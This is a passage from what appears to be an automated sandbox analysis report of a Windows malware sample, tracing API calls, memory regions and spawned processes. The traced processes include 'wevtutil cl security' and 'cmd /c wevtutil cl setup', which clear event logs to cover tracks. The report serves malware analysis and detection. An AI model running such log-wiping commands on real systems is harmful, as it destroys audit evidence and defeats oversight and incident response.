FreeEnvironmentStringsA (penv="=") returned 1 [0094.854] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0094.855] GetEnvironmentStringsW () returned 0x4557d58* [0094.855] FreeEnvironmentStringsA (penv="=") returned 1 [0094.855] DeleteProcThreadAttributeList (in: lpAttributeList=0x450f5a8 | out: lpAttributeList=0x450f5a8) [0094.855] _get_osfhandle (_FileHandle=1) returned 0x3c [0094.855] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0094.855] _get_osfhandle (_FileHandle=1) returned 0x3c [0094.855] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0094.855] _get_osfhandle (_FileHandle=0) returned 0x38 [0094.855] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0094.855] SetConsoleInputExeNameW () returned 0x1 [0094.855] GetConsoleOutputCP () returned 0x1b5 [0094.855] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0094.855] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.856] exit (_Code=0) Thread: id = 16 os_tid = 0x2d0 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x749ee000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x168" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 386 start_va = 0x7f270000 end_va = 0x7f270fff entry_point = 0x0 region_type = private name = "private_0x000000007f270000" filename = "" Region: id = 387 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 388 start_va = 0x100000000 end_va = 0x10001ffff entry_point = 0x0 region_type = private name = "private_0x0000000100000000" filename = "" Region: id = 389 start_va = 0x100020000 end_va = 0x100033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000100020000" filename = "" Region: id = 390 start_va = 0x100040000 end_va = 0x10007ffff entry_point = 0x0 region_type = private name = "private_0x0000000100040000" filename = "" Region: id = 391 start_va = 0x7df5ff340000 end_va = 0x7ff5ff33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff340000" filename = "" Region: id = 392 start_va = 0x7ff6c3cf0000 end_va = 0x7ff6c3d12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3cf0000" filename = "" Region: id = 393 start_va = 0x7ff6c3d16000 end_va = 0x7ff6c3d16fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d16000" filename = "" Region: id = 394 start_va = 0x7ff6c3d1e000 end_va = 0x7ff6c3d1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d1e000" filename = "" Region: id = 395 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 396 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 397 start_va = 0x1000a0000 end_va = 0x10019ffff entry_point = 0x0 region_type = private name = "private_0x00000001000a0000" filename = "" Region: id = 398 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 399 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 400 start_va = 0x100000000 end_va = 0x10000ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000100000000" filename = "" Region: id = 401 start_va = 0x100010000 end_va = 0x100016fff entry_point = 0x0 region_type = private name = "private_0x0000000100010000" filename = "" Region: id = 402 start_va = 0x100080000 end_va = 0x100080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000100080000" filename = "" Region: id = 403 start_va = 0x100090000 end_va = 0x100096fff entry_point = 0x0 region_type = private name = "private_0x0000000100090000" filename = "" Region: id = 404 start_va = 0x1001a0000 end_va = 0x10025dfff entry_point = 0x1001a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 405 start_va = 0x100260000 end_va = 0x10029ffff entry_point = 0x0 region_type = private name = "private_0x0000000100260000" filename = "" Region: id = 406 start_va = 0x1002a0000 end_va = 0x1002a0fff entry_point = 0x0 region_type = private name = "private_0x00000001002a0000" filename = "" Region: id = 407 start_va = 0x1002b0000 end_va = 0x1002b0fff entry_point = 0x0 region_type = private name = "private_0x00000001002b0000" filename = "" Region: id = 408 start_va = 0x1003f0000 end_va = 0x1003fffff entry_point = 0x0 region_type = private name = "private_0x00000001003f0000" filename = "" Region: id = 409 start_va = 0x100400000 end_va = 0x100587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000100400000" filename = "" Region: id = 410 start_va = 0x100590000 end_va = 0x100710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000100590000" filename = "" Region: id = 411 start_va = 0x100720000 end_va = 0x101b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000100720000" filename = "" Region: id = 412 start_va = 0x7ff6c3bf0000 end_va = 0x7ff6c3ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3bf0000" filename = "" Region: id = 413 start_va = 0x7ff6c3d1c000 end_va = 0x7ff6c3d1dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d1c000" filename = "" Region: id = 414 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 415 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 416 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 417 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 418 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 419 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 420 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 421 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 422 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 423 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 424 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 425 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 13 os_tid = 0xb4c Thread: id = 14 os_tid = 0x778 Thread: id = 15 os_tid = 0x53c Process: id = "7" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x210aa000" os_pid = "0x758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x168" cmd_line = "wevtutil cl security" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 439 start_va = 0xac0000 end_va = 0xaeefff entry_point = 0xac0000 region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 440 start_va = 0xcf0000 end_va = 0x4ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cf0000" filename = "" Region: id = 441 start_va = 0x4cf0000 end_va = 0x4d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 442 start_va = 0x4d10000 end_va = 0x4d11fff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 443 start_va = 0x4d20000 end_va = 0x4d33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d20000" filename = "" Region: id = 444 start_va = 0x4d40000 end_va = 0x4d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 445 start_va = 0x4d80000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 446 start_va = 0x4dc0000 end_va = 0x4dc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 447 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 448 start_va = 0x4de0000 end_va = 0x4de1fff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 449 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 450 start_va = 0x7f210000 end_va = 0x7f232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f210000" filename = "" Region: id = 451 start_va = 0x7f238000 end_va = 0x7f238fff entry_point = 0x0 region_type = private name = "private_0x000000007f238000" filename = "" Region: id = 452 start_va = 0x7f23b000 end_va = 0x7f23dfff entry_point = 0x0 region_type = private name = "private_0x000000007f23b000" filename = "" Region: id = 453 start_va = 0x7f23e000 end_va = 0x7f23efff entry_point = 0x0 region_type = private name = "private_0x000000007f23e000" filename = "" Region: id = 454 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 455 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 456 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 457 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 458 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 459 start_va = 0x4e30000 end_va = 0x4e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 460 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 461 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 462 start_va = 0x4f40000 end_va = 0x503ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 463 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 17 os_tid = 0xb0c Thread: id = 18 os_tid = 0x544 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x28589000" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c wevtutil cl setup" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 464 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 465 start_va = 0xba0000 end_va = 0x4b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 466 start_va = 0x4ba0000 end_va = 0x4bbffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 467 start_va = 0x4bc0000 end_va = 0x4bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 468 start_va = 0x4bd0000 end_va = 0x4be3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bd0000" filename = "" Region: id = 469 start_va = 0x4bf0000 end_va = 0x4c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 470 start_va = 0x4c30000 end_va = 0x4d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 471 start_va = 0x4d30000 end_va = 0x4d33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d30000" filename = "" Region: id = 472 start_va = 0x4d40000 end_va = 0x4d40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d40000" filename = "" Region: id = 473 start_va = 0x4d50000 end_va = 0x4d51fff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 474 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 475 start_va = 0x7e620000 end_va = 0x7e642fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e620000" filename = "" Region: id = 476 start_va = 0x7e64a000 end_va = 0x7e64afff entry_point = 0x0 region_type = private name = "private_0x000000007e64a000" filename = "" Region: id = 477 start_va = 0x7e64c000 end_va = 0x7e64efff entry_point = 0x0 region_type = private name = "private_0x000000007e64c000" filename = "" Region: id = 478 start_va = 0x7e64f000 end_va = 0x7e64ffff entry_point = 0x0 region_type = private name = "private_0x000000007e64f000" filename = "" Region: id = 479 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 480 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 481 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 482 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 483 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 484 start_va = 0x4e10000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 485 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 486 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 487 start_va = 0x4fc0000 end_va = 0x50bffff entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 488 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 529 start_va = 0x4ba0000 end_va = 0x4baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 530 start_va = 0x4d60000 end_va = 0x4d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 531 start_va = 0x4e20000 end_va = 0x4eddfff entry_point = 0x4e20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 532 start_va = 0x50c0000 end_va = 0x51bffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 533 start_va = 0x52f0000 end_va = 0x52fffff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 534 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 535 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 536 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 537 start_va = 0x7e520000 end_va = 0x7e61ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e520000" filename = "" Region: id = 538 start_va = 0x7e647000 end_va = 0x7e649fff entry_point = 0x0 region_type = private name = "private_0x000000007e647000" filename = "" Region: id = 539 start_va = 0x4bb0000 end_va = 0x4bb3fff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 540 start_va = 0x4bc0000 end_va = 0x4bc3fff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 541 start_va = 0x5300000 end_va = 0x5636fff entry_point = 0x5300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 19 os_tid = 0x9cc [0094.999] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0094.999] __set_app_type (_Type=0x1) [0094.999] __p__fmode () returned 0x77ac4d6c [0094.999] __p__commode () returned 0x77ac5b1c [0094.999] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0094.999] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0095.000] GetCurrentThreadId () returned 0x9cc [0095.000] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x84 [0095.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0095.000] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0095.000] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.002] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4d2f854 | out: phkResult=0x4d2f854*=0x0) returned 0x2 [0095.002] VirtualQuery (in: lpAddress=0x4d2f85b, lpBuffer=0x4d2f80c, dwLength=0x1c | out: lpBuffer=0x4d2f80c*(BaseAddress=0x4d2f000, AllocationBase=0x4c30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0095.002] VirtualQuery (in: lpAddress=0x4c30000, lpBuffer=0x4d2f80c, dwLength=0x1c | out: lpBuffer=0x4d2f80c*(BaseAddress=0x4c30000, AllocationBase=0x4c30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0095.002] VirtualQuery (in: lpAddress=0x4c31000, lpBuffer=0x4d2f80c, dwLength=0x1c | out: lpBuffer=0x4d2f80c*(BaseAddress=0x4c31000, AllocationBase=0x4c30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0095.002] VirtualQuery (in: lpAddress=0x4c33000, lpBuffer=0x4d2f80c, dwLength=0x1c | out: lpBuffer=0x4d2f80c*(BaseAddress=0x4c33000, AllocationBase=0x4c30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0095.002] VirtualQuery (in: lpAddress=0x4d30000, lpBuffer=0x4d2f80c, dwLength=0x1c | out: lpBuffer=0x4d2f80c*(BaseAddress=0x4d30000, AllocationBase=0x4d30000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0095.002] GetConsoleOutputCP () returned 0x1b5 [0095.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.003] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0095.003] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.003] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0095.003] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.003] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0095.003] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.003] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0095.003] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.003] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0095.004] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.004] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0095.004] GetEnvironmentStringsW () returned 0x4fc7d50* [0095.004] FreeEnvironmentStringsA (penv="A") returned 1 [0095.004] GetEnvironmentStringsW () returned 0x4fc7d50* [0095.004] FreeEnvironmentStringsA (penv="A") returned 1 [0095.004] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4d2e7b8 | out: phkResult=0x4d2e7b8*=0x94) returned 0x0 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x0, lpData=0x4d2e7c4*=0xf9, lpcbData=0x4d2e7c0*=0x1000) returned 0x2 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x1, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x0, lpData=0x4d2e7c4*=0x1, lpcbData=0x4d2e7c0*=0x1000) returned 0x2 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x0, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x40, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x4, lpData=0x4d2e7c4*=0x40, lpcbData=0x4d2e7c0*=0x4) returned 0x0 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4d2e7bc, lpData=0x4d2e7c4, lpcbData=0x4d2e7c0*=0x1000 | out: lpType=0x4d2e7bc*=0x0, lpData=0x4d2e7c4*=0x40, lpcbData=0x4d2e7c0*=0x1000) returned 0x2 [0095.004] RegCloseKey (hKey=0x94) returned 0x0 [0095.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4d2e7b8 | out: phkResult=0x4d2e7b8*=0x94) returned 0x0 [0095.004] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", 